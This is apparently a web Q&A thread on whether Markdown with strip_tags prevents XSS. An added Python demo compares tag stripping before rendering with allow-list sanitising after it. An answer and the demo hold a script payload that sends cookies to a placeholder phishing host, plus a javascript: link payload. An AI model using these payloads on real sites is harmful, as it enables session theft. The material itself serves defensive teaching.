Is Markdown (with strip_tags) sufficient to stop XSS attacks?

Backend · unresolved · 7 answers · 1080 views
温柔的废话 2020-12-16 01:31

I'm working on a web application that allows users to type short descriptions of items in a catalog. I'm allowing Markdown in my textareas so users can do some HTML format

7 answers
  • 2020-12-16 02:24

    Here's a lovely example of why you need to sanitize the HTML after, not before:

    Markdown code:

    >  <script type="text/javascript"
    >  language="js">i=new Image(); i.src='http://phishingwebsite.example.com/?l='
    > + escape(window.location) + '&c=' + escape(document.cookie);
    > </script>
    >
    

    Rendered as:

    <blockquote> 
    <p><script type="text/javascript"
     language="js">i=new Image(); i.src='http://phishingwebsite.example.com/?l='
    + escape(window.location) + '&amp;c=' + escape(document.cookie);
    </script></p> 
    </blockquote> 
    

    Now are you worried?

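The reply above argues for sanitising the rendered HTML rather than the Markdown source. The Python below is an added example, not code from the post, from PHP's `strip_tags` or from any Markdown library: `render_markdown` is a hypothetical stand-in for a Markdown renderer (it handles only `>` blockquotes, `[text](url)` links and raw-HTML passthrough, which is what matters here), `strip_tags` is a regex stand-in for the PHP function, and `AllowListSanitizer` is an allow-list sanitiser built on the standard library's `html.parser`. The sample input is constructed: it combines the reply's script-in-blockquote payload with a `javascript:` link, a construct that has no HTML tag in the source at all and only becomes an `<a href>` once Markdown has rendered it. Both orderings, strip-then-render and render-then-allow-list, are run on the same input.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input: the reply's script-in-blockquote payload, plus a
# Markdown link whose dangerous href only exists after rendering.
MARKDOWN_SOURCE = """> <script type="text/javascript"
> language="js">i=new Image(); i.src='http://phishingwebsite.example.com/?l='
> + escape(window.location) + '&c=' + escape(document.cookie);
> </script>

Visit [our catalog](javascript:alert(document.cookie)) today.
"""

LINK_RE = re.compile(r"\[([^\]]+)\]\((\S+?)\)(?!\))")


def render_markdown(src: str) -> str:
    """Hypothetical stand-in for a Markdown renderer (not a real library).
    Like real Markdown it passes raw HTML through untouched, removes the
    leading '>' of blockquote lines, and turns [text](url) into <a href>."""
    blocks = []
    for block in re.split(r"\n\s*\n", src.strip()):
        lines = block.split("\n")
        quoted = all(line.startswith(">") for line in lines)
        if quoted:
            lines = [line[1:].lstrip() for line in lines]
        text = LINK_RE.sub(r'<a href="\2">\1</a>', "\n".join(lines))
        para = f"<p>{text}</p>"
        blocks.append(f"<blockquote>\n{para}\n</blockquote>" if quoted else para)
    return "\n".join(blocks)


TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(text: str) -> str:
    """Naive stand-in for PHP's strip_tags (same idea, not the same state
    machine): delete everything from a '<' to the next '>'."""
    return TAG_RE.sub("", text)


ALLOWED_TAGS = {"p", "blockquote", "em", "strong", "code", "pre", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class AllowListSanitizer(HTMLParser):
    """Re-serialise rendered HTML keeping only allow-listed elements and
    attributes. Unknown tags are dropped but their text is kept (escaped);
    <script>/<style> bodies are dropped entirely."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside script/style content

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = (value or "").strip()
            # href survives only with an allow-listed scheme prefix, so
            # javascript:, data:, vbscript: and friends never get through.
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize_html(rendered: str) -> str:
    parser = AllowListSanitizer()
    parser.feed(rendered)
    parser.close()
    return "".join(parser.out)


def sanitize_before_render(src: str) -> str:
    """The ordering the question proposes: strip_tags on the Markdown source."""
    return render_markdown(strip_tags(src))


def sanitize_after_render(src: str) -> str:
    """The ordering the reply recommends: allow-list the HTML the browser gets."""
    return sanitize_html(render_markdown(src))


if __name__ == "__main__":
    print("--- strip_tags before rendering ---\n" + sanitize_before_render(MARKDOWN_SOURCE))
    print("--- allow-list after rendering ---\n" + sanitize_after_render(MARKDOWN_SOURCE))
```

Running it, the strip-then-render output still carries `<a href="javascript:alert(document.cookie)">`, because nothing that runs before rendering can see a tag that Markdown has not produced yet; the render-then-allow-list output keeps the blockquote and the link text but has no `<script>` element, no script body and no `href`. Whether a source-level stripper happens to catch the multi-line script payload depends on how it tokenises across the `>` prefixes (this toy regex breaks the tag at the first `>`), which is exactly the kind of accident a sanitiser should not rely on.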